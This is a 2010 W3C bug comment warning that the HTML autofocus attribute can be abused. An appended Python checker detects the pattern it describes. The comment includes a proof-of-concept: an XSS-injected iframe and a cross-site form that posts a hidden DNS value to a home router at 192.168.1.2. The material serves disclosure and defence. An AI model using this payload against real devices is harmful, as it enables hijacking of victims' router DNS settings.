[Bug 9602] That autofocus attribute will wreak security havoc. What an ignorant idea to bring more logic to HTML. I think I know a couple of ways to abuse it, since it actually is some sort of flow control, which only scripting languages should be capable of. I hope

http://www.w3.org/Bugs/Public/show_bug.cgi?id=9602





--- Comment #2 from Skyphire <sasha@scarletred.nl>  2010-04-28 16:11:17 ---
Another PoC utilizes autofocus to bubble focus to the submit button on another
page, thereby making a CSRF to change a home router's DNS settings, as an
example; it can be anything else malicious.

!! Test.html (on trusted server)

<!doctype html>
<html>
<head>
<meta charset="UTF-8">
<title>CSRF example</title>
</head>
<body>

<!-- CSRF example injected portion through XSS/Unsanitized database -->
<iframe name="csrf" src="csrf.html" style="position:absolute; top:50; left:90;
z-index:2; height:25px; background-color:magenta;" scrolling="no"></iframe>

</body>
</html>


!! CSRF.html (on untrusted server)

<!doctype html>
<html>
<head>
<meta charset="UTF-8">
<title>Change router DNS settings</title>
</head>
<body>
<form name="logo" method="POST" action="http://192.168.1.2/">
<input type="text" name="log">
<input type="hidden" name="DNS" value="255.255.255.255">
<input type="submit" name="submit" value="submit" autofocus> <!-- setting
autofocus on SUBMIT; Bad idea... -->
</form>
</body>
</html>

-Skyphire


Received on Wednesday, 28 April 2010 16:11:19 UTC
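
An added example, not part of the original bug comment: a static check that flags forms whose submit control carries autofocus, and notes whether the form action is a literal private-network address, as in the CSRF.html form above. The names audit, AutofocusSubmitAudit and targets_private_host, and the benign sample form, are assumptions made for this illustration.

```python
from html.parser import HTMLParser
from ipaddress import ip_address
from urllib.parse import urlsplit

# The form from CSRF.html in the comment above, plus a constructed benign form.
SAMPLE_CSRF = """<form name="logo" method="POST" action="http://192.168.1.2/">
<input type="text" name="log">
<input type="hidden" name="DNS" value="255.255.255.255">
<input type="submit" name="submit" value="submit" autofocus>
</form>"""
SAMPLE_BENIGN = """<form method="post" action="/login">
<input type="text" name="user" autofocus><input type="submit" value="Log in">
</form>"""

def targets_private_host(url):
    """True when the URL host is a literal private, loopback or link-local IP."""
    host = urlsplit(url).hostname
    try:
        ip = ip_address(host or "")
    except ValueError:
        return False  # relative URL or a DNS name: not resolved here
    return ip.is_private or ip.is_loopback or ip.is_link_local

class AutofocusSubmitAudit(HTMLParser):
    """Records every form whose submit control carries autofocus."""
    def __init__(self):
        super().__init__()
        self.form = None  # attributes of the <form> currently open, if any
        self.findings = []
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.form = a
        elif tag in ("input", "button") and "autofocus" in a and self.form is not None:
            # <button> defaults to type=submit, <input> to type=text
            kind = (a.get("type") or ("submit" if tag == "button" else "text")).lower()
            if kind in ("submit", "image"):
                action = self.form.get("action") or ""
                self.findings.append({"action": action,
                                      "method": (self.form.get("method") or "get").upper(),
                                      "private_target": targets_private_host(action)})
    def handle_endtag(self, tag):
        if tag == "form":
            self.form = None

def audit(html):
    parser = AutofocusSubmitAudit()
    parser.feed(html)
    return parser.findings
```

A finding with private_target set to True marks the case from the comment: a cross-site form aimed at a device on the local network, with focus pre-placed on its submit control.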